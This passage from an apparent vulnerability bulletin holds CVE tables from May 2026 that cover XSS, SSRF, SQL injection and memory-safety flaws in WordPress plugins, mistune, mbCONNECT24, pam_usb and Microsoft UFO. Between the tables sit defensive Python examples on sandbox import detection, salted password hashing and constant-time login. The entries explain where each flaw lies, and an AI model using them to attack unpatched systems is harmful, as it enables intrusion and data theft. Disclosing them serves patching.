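    """Normalise first (strip comments), then match; also accept comments
    inline in the pattern so either layer alone catches the payload."""
    return bool(TOLERANT_IMPORT_RE.search(code)) or bool(
        NAIVE_IMPORT_RE.search(strip_js_comments(code))
    )


def compare(code: str) -> dict:
    return {"naive": naive_blocks_dynamic_import(code),
            "hardened": hardened_blocks_dynamic_import(code)}
```

The durable fix is not a better regex: remove the capability from the sandbox (so `import()` resolves through the same proxy as `require`, or is unavailable) rather than trying to recognise every spelling of it in source text.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|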
| larsdrasmussen--rexCrawler | The rexCrawler plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-05-27 | 4.8 | CVE-2026-2280 |
| LearningCircuit--local-deep-research | Local Deep Research is an AI-powered research assistant for deep, iterative research. Prior to 1.6.0, PDFService._markdown_to_html() constructs an HTML document by interpolating user-controlled values - specifically title (sourced from research.title or research.query) and metadata key-value pairs - directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf_validator.py. This vulnerability is fixed in 1.6.0. | 2026-05-28 | 5 | CVE-2026-43979 |
| LearningCircuit--local-deep-research | Local Deep Research is an AI-powered research assistant for deep, iterative research. Prior to 1.6.10, the URL checking logic in local-deep-research has a logical flaw that attackers could bypass, leading to SSRF. The project uses validate_url to validate the input URL; its main logic is to perform security checks on the host portion of the URL as extracted by urlparse, to prevent SSRF. However, urlparse and the library that actually sends the request can parse the same URL differently. For example, in safe_get, validate_url is first used to perform the SSRF check, and then requests.get is used to send the actual request. This vulnerability is fixed in 1.6.10. | 2026-05-28 | 5 | CVE-2026-46526 |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, the mistune math plugin renders inline math ($...$) and block math ($$...$$) by concatenating the raw user-supplied content directly into the HTML output without any HTML escaping. This occurs even when the parser is explicitly created with escape=True, which is supposed to guarantee that all user-controlled text is sanitised before reaching the DOM. This vulnerability is fixed in 3.2.1. | 2026-05-26 | 6.1 | CVE-2026-44708 |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML - with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element. This vulnerability is fixed in 3.2.1. | 2026-05-26 | 6.1 | CVE-2026-44897 |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, render_toc_ul() builds a <ul> table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href="#<id>") and the text value (used as the visible link label) are inserted into <a> tags via a plain Python format string - with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href="#..." attribute context, injecting arbitrary HTML tags including <script> blocks directly into the rendered TOC. This vulnerability is fixed in 3.2.1. | 2026-05-26 | 6.1 | CVE-2026-44898 |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, the Image directive plugin validates the :width: and :height: options with a regex compiled as _num_re = re.compile(r"^\d+(?:\.\d*)?"). When the validated value is not a plain integer, render_block_image() inserts it directly into a style="width:...;" or style="height:...;" attribute. Because the value was accepted by the prefix-only regex, any CSS after the leading digits reaches the style= attribute verbatim and without escaping. This vulnerability is fixed in 3.2.1. | 2026-05-26 | 4.7 | CVE-2026-44899 |
| lhughes33472--MetaMagic SEO Plugin | The MetaMagic SEO Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6. This is due to missing or incorrect nonce validation on the metamagic_update_options function. This makes it possible for unauthenticated attackers to modify the plugin's SEO settings, including enabling or disabling the plugin and toggling description and keyword meta tag output via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8942 |
| libusb--libusb | libusb before version 1.0.30 contains a NULL pointer dereference vulnerability that allows attackers to crash applications by supplying a malformed USB configuration descriptor where an interface claims bNumEndpoints greater than zero but is followed by a class-specific descriptor whose bLength exceeds the remaining buffer size, causing parse_interface() to return early without allocating the endpoint array. Attackers can exploit this flaw through libusb_get_active_config_descriptor or libusb_get_config_descriptor by providing crafted descriptors via virtualized USB passthrough, file-based descriptor parsing, or network sources, causing any application iterating over endpoints to dereference a NULL endpoint pointer and crash. | 2026-05-27 | 6.2 | CVE-2026-23679 |
| libusb--libusb | libusb before version 1.0.30 contains a one-byte out-of-bounds read vulnerability in parse_iad_array() in descriptor.c that allows attackers to trigger a denial of service by supplying a malformed USB descriptor whose bLength equals size minus one, causing the bounds check to use the original buffer size instead of the remaining size. Attackers in virtualized environments with USB passthrough can supply crafted descriptors through libusb_get_active_interface_association_descriptors or libusb_get_interface_association_descriptors to read one byte past the end of the malloc allocation, resulting in a denial of service. | 2026-05-27 | 4 | CVE-2026-47104 |
| libyang--libyang | libyang before 5.2.6 contains a heap use-after-free write vulnerability in lyd_parser_set_data_flags that incorrectly updates metadata list pointers when freeing non-head default metadata entries. Attackers can trigger this vulnerability by submitting crafted YANG XML documents with specific metadata attributes to applications parsing untrusted XML data, causing process crashes or potential code execution. | 2026-05-26 | 6.5 | CVE-2026-41401 |
| Linethemes--NanoCare | Missing Authorization vulnerability in Linethemes NanoCare allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects NanoCare: from n/a before 1.2.2. | 2026-05-25 | 5.4 | CVE-2026-32389 |
| livemesh--Livemesh Addons for Beaver Builder | The Livemesh Addons for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `labb_admin_ajax` AJAX action in all versions up to, and including, 3.9.2 due to missing authorization checks and insufficient input sanitization. The AJAX handler verifies a nonce but does not check user capabilities. This makes it possible for authenticated attackers with Subscriber-level access and above to modify plugin settings and inject malicious scripts that execute when administrators access the plugin settings page or when any user visits the frontend. | 2026-05-27 | 6.4 | CVE-2026-3897 |
| livemesh--Livemesh SiteOrigin Widgets | The Livemesh SiteOrigin Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `lsow_admin_ajax` AJAX action in all versions up to, and including, 3.9.2 due to missing authorization checks and insufficient input sanitization. The AJAX handler verifies a nonce but does not check user capabilities. This makes it possible for authenticated attackers with Subscriber-level access and above to modify plugin settings and inject malicious scripts that execute when administrators access the plugin settings page or when any user visits the frontend. | 2026-05-27 | 6.4 | CVE-2026-3896 |
| livemesh--WPBakery Page Builder Addons by Livemesh | The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `[lvca_carousel]` and `[lvca_posts_carousel]` shortcode attributes in all versions up to, and including, 3.9.4 due to insufficient input sanitization and output escaping. Specifically, shortcode attributes are encoded with `wp_json_encode()` and output into single-quoted `data-settings` HTML attributes without using `esc_attr()`, allowing attackers to break out of the attribute by injecting single quotes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-2030 |
| livemesh--WPBakery Page Builder Addons by Livemesh | The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `lvca_admin_ajax` AJAX action in all versions up to, and including, 3.9.4 due to missing authorization checks and insufficient input sanitization. The AJAX handler verifies a nonce but does not check user capabilities. This makes it possible for authenticated attackers with Subscriber-level access and above to modify plugin settings and inject malicious scripts that execute when administrators access the plugin settings page or when any user visits the frontend. | 2026-05-27 | 6.4 | CVE-2026-3895 |
| Lucian Apostol--Auto Affiliate Links | Missing Authorization vulnerability in Lucian Apostol Auto Affiliate Links allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Auto Affiliate Links: from n/a through 6.8.8.3. | 2026-05-25 | 5.3 | CVE-2026-24592 |
| macrozheng--mall | A vulnerability was found in macrozheng mall up to 1.0.3. This affects an unknown function of the file /admin/update/ of the component Super Admin Password Handler. Performing a manipulation results in improper authorization. Remote exploitation of the attack is possible. The vendor deleted the GitHub issue for this vulnerability without any explanation. Afterwards the vendor was contacted early about this disclosure via email but did not respond in any way. | 2026-05-29 | 4.7 | CVE-2026-10070 |
| Magepeople inc.--Taxi Booking Manager for WooCommerce | Missing Authorization vulnerability in Magepeople inc. Taxi Booking Manager for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Taxi Booking Manager for WooCommerce: from n/a through 2.0.1. | 2026-05-26 | 5.3 | CVE-2026-25426 |
| Magepeople inc.--WpBookingly | Missing Authorization vulnerability in Magepeople inc. WpBookingly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpBookingly: from n/a through 1.2.9. | 2026-05-26 | 4.3 | CVE-2026-25444 |
| Magepeople inc.--WpTravelly | Missing Authorization vulnerability in Magepeople inc. WpTravelly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpTravelly: from n/a through 2.1.5. | 2026-05-26 | 6.3 | CVE-2026-27331 |
| Mamunur Rashid--The Post Grid | Missing Authorization vulnerability in Mamunur Rashid The Post Grid allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Post Grid: from n/a through 7.9.2. | 2026-05-27 | 4.3 | CVE-2026-49054 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to filter nil elements from outgoing webhook attachment payloads before processing, which allows an authenticated user to cause a denial of service (server process termination) via a crafted webhook callback response containing a null attachment entry. Mattermost Advisory ID: MMSA-2026-00641 | 2026-05-25 | 6.5 | CVE-2026-4915 |
| mauriceboe--TREK | TREK is a collaborative travel planner. Prior to 3.0.18, early return on missing user during login flow allowed an attacker to enumerate valid user accounts via response timing discrepancy. When an email address existed in the database, the backend performed a bcrypt password comparison before returning a 401 Unauthorized, adding ~370 ms of latency. When the email did not exist, the backend returned immediately (~10 ms). This ~14× timing difference could be detected without any difference in HTTP status codes or response bodies. This vulnerability is fixed in 3.0.18. | 2026-05-28 | 5.3 | CVE-2026-45410 |
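
Added example (not TREK's or WeGIA's code) covering both the unsalted-SHA-256 storage issue in the WeGIA entry above and the early-return timing leak in the TREK entry: per-user salted password hashing with a deliberately slow KDF, and a login routine that performs the same amount of work whether or not the account exists. PBKDF2-HMAC-SHA256 from the standard library stands in for bcrypt; the iteration count, dummy record and sample users are constructed.

```python
import hashlib
import hmac
import os
import time

# Constructed stand-in for bcrypt; tune iterations to ~100ms on your hardware.
KDF_ITERATIONS = 200_000


def unsalted_sha256(password: str) -> str:
    """The weak pattern: fast hash, no salt, identical passwords -> identical digests."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, salt: bytes = None):
    """Per-user random salt plus a slow KDF. Returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ITERATIONS)
    return hmac.compare_digest(candidate, stored)


# Dummy credential compared against when the account does not exist, so the
# KDF runs on every attempt. The dummy password is never a valid login.
_DUMMY_SALT, _DUMMY_HASH = hash_password(os.urandom(32).hex())


def login_early_return(users: dict, email: str, password: str) -> bool:
    """Vulnerable pattern: unknown emails return before the expensive compare,
    so response time reveals whether the account exists."""
    rec = users.get(email)
    if rec is None:
        return False
    return verify_password(password, *rec)


def login_constant_work(users: dict, email: str, password: str) -> bool:
    """Always runs the KDF; unknown accounts are checked against the dummy
    record and rejected afterwards, so timing no longer depends on existence."""
    rec = users.get(email)
    salt, stored = rec if rec is not None else (_DUMMY_SALT, _DUMMY_HASH)
    ok = verify_password(password, salt, stored)
    return ok and rec is not None


def time_login(fn, users: dict, email: str, password: str) -> float:
    """Wall-clock milliseconds for one login attempt (for manual inspection)."""
    t0 = time.perf_counter()
    fn(users, email, password)
    return (time.perf_counter() - t0) * 1000.0
```

Run `time_login(login_early_return, users, "nobody@example.org", "x")` against a real address to see the gap the TREK entry describes; with `login_constant_work` the two cases take the same time. Keep the dummy record's salt and hash static for the process lifetime so that the unknown-user path costs the same as the known-user path, and never let the dummy comparison alone grant access.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|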
| Mautic--Mautic 7 Project Selector | A stored Cross-Site Scripting (XSS) vulnerability exists in the project selector component of Mautic 7. When rendering selection menus for associating projects with system entities, the application fails to sanitize project names returned via AJAX before injecting them into the DOM as option fields. An authenticated user with permissions to create projects can exploit this to store a malicious script payload in the project's name. When another administrative user subsequently opens an entity editor containing the project selector, the injected script executes within the context of their active browser session. This could allow an attacker to hijack the session, perform unauthorized state coordination, or access organizational data within the dashboard. | 2026-05-29 | 5.4 | CVE-2026-9811 |
| Mautic--Mautic Focus Component | A Server-Side Request Forgery (SSRF) vulnerability exists in Mautic's Focus component. Due to insufficient validation of user-supplied URLs, an authenticated user can trigger outbound HTTP requests from the hosting server, enabling internal network reconnaissance or forcing requests to arbitrary internal or external destinations. | 2026-05-29 | 6.4 | CVE-2026-9557 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the Easy View due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40831 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getDevicegroups function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40832 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the saveObjectFromData function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40835 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getProjectScalings function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40837 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getDeviceScalings function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40838 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getComponentScalings function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40839 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the VerifyCreateLicences function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40840 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getProjectTags function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40841 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getWidgetTags function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40842 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the alarming view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40843 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dashboard view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40844 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the devices_configuration view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40845 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the system view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40846 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the system_tag view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40847 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the tag view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40848 |
| MB connect line--mbCONNECT24 | A low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the user_alarmprofile view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40849 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the DevSerialReset function due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40823 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the accountstatus view userid parameter due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40824 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the accountstatus view devices parameter due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40825 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the _RemoveRequest function due to improper neutralization of special elements in a SQL DELETE command allowing for reading the whole database and deleting entries in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40827 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the DeleteSysLogEntry function due to improper neutralization of special elements in a SQL DELETE command allowing for reading the whole database and deleting entries in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40828 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the view.html.php files UpdateParam function due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40829 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the admin.mbnetj.php files UpdateParam function due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40830 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getAccountByID function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 4.9 | CVE-2026-40821 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the DevSerialReset function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 4.9 | CVE-2026-40822 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dsgvo_contracts view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 4.9 | CVE-2026-40826 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, pam_usb is a PAM module loaded into the host process (sudo, login, GDM, GNOME Shell). Display managers such as GDM run multiple concurrent authentication threads. Three functions used by the deny_remote feature called the non-reentrant strtok(), which stores state in a single global pointer. If two authentications race, one thread's strtok() call can overwrite the other's in-progress tokenisation pointer, causing incorrect parsing of the tmux session data or the /proc environ scan that backs the remote-session detection logic. Additionally, pusb_tmux_get_client_tty() passed the raw pointer returned by getenv(TMUX) directly to strtok(). getenv() returns a pointer into the live process environment block; strtok() inserts NUL bytes into that block, permanently corrupting the TMUX variable for subsequent code running in the same process. In long-lived display managers this affects all future authentications in that process. The combined effect can cause deny_remote=true to return an incorrect decision for a remote session, or an incorrect decision for a local session, depending on thread interleaving. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 6.3 | CVE-2026-47270 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, pam_usb builds XPath expressions from user-supplied identifiers (PAM username, service name) and device-supplied identifiers (USB device serial, model, vendor) to query /etc/pamusb.conf. These identifiers were not validated for XPath metacharacters, allowing injection of arbitrary XPath predicates. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 6.5 | CVE-2026-47273 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, multiple pam_usb helper tools resolved external binaries through the PATH environment variable rather than using absolute paths. An attacker who can influence the process environment during PAM authentication or tool execution could substitute malicious binaries. The affected tools are pamusb-check (src/tmux.c), pamusb-conf (tools/pamusb-conf), and pamusb-keyring-unlock-gnome (tools/pamusb-keyring-unlock-gnome). This vulnerability is fixed in 0.9.0. | 2026-05-27 | 6.3 | CVE-2026-47274 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, src/conf.c allocates heap memory proportional to n_devices, a count derived from libxml2 XPath evaluation of the config file, without first enforcing an upper bound. On 32-bit targets (armv7l, i686 -- both listed in the project Makefile), the multiplication n_devices * sizeof(t_pusb_device) wraps around size_t, causing xmalloc() to receive a very small size. Because xmalloc() only calls abort() on NULL return, a small-but-non-NULL allocation is accepted, and subsequent array writes overflow the heap. This vulnerability is fixed in 0.9.1. | 2026-05-27 | 6.7 | CVE-2026-48065 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, src/mem.c implemented out-of-memory guards for xmalloc(), xrealloc(), and xstrdup() using assert(data != NULL). The C standard specifies that all assert() expressions are compiled out when NDEBUG is defined at build time. NDEBUG is commonly defined in release and packaging builds (Debian, Fedora, Arch package flags all define it via -DNDEBUG in CFLAGS). With the guard removed, xmalloc/xrealloc/xstrdup silently return NULL on allocation failure. Every caller in the codebase dereferences the return value without a NULL check -- this is the intended design, as the guard was supposed to abort before the dereference. With the guard gone, any allocation failure causes a NULL pointer dereference, crashing the PAM module. A crash in a PAM module loaded by sudo or login causes authentication to fail for the duration of the crash, creating a local denial-of-service condition. An attacker who can induce memory pressure at authentication time can lock all users out of sudo and login. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 5.1 | CVE-2026-47271 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, src/log.c contains a process-wide static pointer that is written on every PAM invocation with the address of a stack-local variable. This violates the PAM re-entrancy requirement and creates a data race when the PAM stack is invoked concurrently from multiple threads. This vulnerability is fixed in 0.9.1. | 2026-05-27 | 5.7 | CVE-2026-48066 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, src/device.c passed the return values of udisks_drive_get_serial(), udisks_drive_get_vendor(), and udisks_drive_get_model() directly to strcmp() without NULL checks. The GIO/UDisks API documentation states these accessors can return NULL for devices that do not expose the corresponding field. Passing NULL to strcmp() is undefined behaviour (typically a SIGSEGV). This vulnerability is fixed in 0.8.7. | 2026-05-27 | 4.6 | CVE-2026-44710 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, src/evdev.c silently ignores EACCES errors when opening /dev/input/event* nodes, causing pusb_has_virtual_input_device() to return 0 (no virtual devices found) even when every open() call failed due to insufficient permissions. The caller in src/local.c cannot distinguish a clean absence of virtual devices from a permission-denied scan, and acts on the false negative by continuing authentication without denying. This vulnerability is fixed in 0.9.1. | 2026-05-27 | 4.4 | CVE-2026-48792 |
| Melapress--WP Activity Log | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Melapress WP Activity Log allows DOM-Based XSS. This issue affects WP Activity Log: from n/a through 5.6.3. | 2026-05-25 | 6.5 | CVE-2026-45435 |
| microsoft--UFO | Microsoft UFO is an open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO creates one shared UFOWebSocketHandler instance and reuses it for multiple authenticated WebSocket connections. The handler stores per-connection protocol objects in mutable instance fields. Each new WebSocket connection overwrites those fields. Later, message handlers send responses through the shared fields instead of through protocol objects bound to the originating connection. As a result, the most recently connected authenticated client can receive protocol responses that belong to another authenticated client. | 2026-05-27 | 6.3 | CVE-2026-46416 |
| microsoft--UFO | Microsoft UFO is an open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO's constellation client tracks pending task responses by session_id only and does not verify that a TASK_END message came from the device that originally received the task. When the constellation sends a task to a target device, it records a pending Future under a session key. The pending task record stores the expected device ID, but the completion path ignores that binding. If another authenticated peer device sends a forged TASK_END with the same session_id, the constellation accepts the response and completes the victim device's pending Future with attacker-controlled result data. This is an authenticated cross-device task-result injection issue. | 2026-05-27 | 5.9 | CVE-2026-46538 |
| microsoft--UFO | Microsoft UFO is an open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO accepts client-supplied session_id values in WebSocket task messages and reuses an existing in-memory session object if that session_id already exists. If a prior session has completed and remains in memory with populated results, a different authenticated client can send a new TASK message using the same session_id. The server re-enters the existing session object and sends the stale stored result to the new requester through the normal send_task_end() callback path. This is an authenticated cross-client stale result replay issue. The issue requires that the attacker knows or can predict a live or recently completed session_id. | 2026-05-27 | 5.3 | CVE-2026-46544 |
| minhnhut--MinhNhut Link Gateway | The MinhNhut Link Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'url' parameter on the redirect page in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-27 | 6.1 | CVE-2026-3349 |
| minhnhut--MinhNhut Link Gateway | The MinhNhut Link Gateway plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's settings (Description, Title, and other fields) in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the redirect page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-05-27 | 4.4 | CVE-2026-3348 |
| mkhfr--Old Posts Highlighter | The Old Posts Highlighter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the OPH_options function. This makes it possible for unauthenticated attackers to update the plugin's configuration settings without authorization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-7614 |
| morettolss--Google+ Link Name | The Google+ Link Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gplusnamelink' shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied attributes ('id' and 'name') in the gplusnamelink_generate() function, which are concatenated directly into the rendered HTML without calling esc_attr() or esc_html(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8842 |
| mr2p--Meta Field Block Display custom fields in the Block Editor without coding | The Meta Field Block plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.5.1. This is due to the plugin allowing users to specify arbitrary object IDs and object types via block attributes without validating whether the authenticated user has permission to access the requested object's metadata. This makes it possible for authenticated attackers, with Contributor-level access and above, to read arbitrary user meta, post meta, and term meta data from any object in the database. On sites using plugins that store sensitive data in meta fields (e.g., WooCommerce billing/shipping information), this could lead to the exposure of Personally Identifiable Information (PII) including names, email addresses, phone numbers, and physical addresses. | 2026-05-28 | 6.5 | CVE-2026-3173 |
| mshomali--Dideo | The Dideo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dideo' shortcode in version 1.0. This is due to insufficient input sanitization and output escaping on the 'id' shortcode attribute, which is interpolated directly into an HTML iframe 'src' attribute without escaping in the dideo() shortcode handler. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8847 |
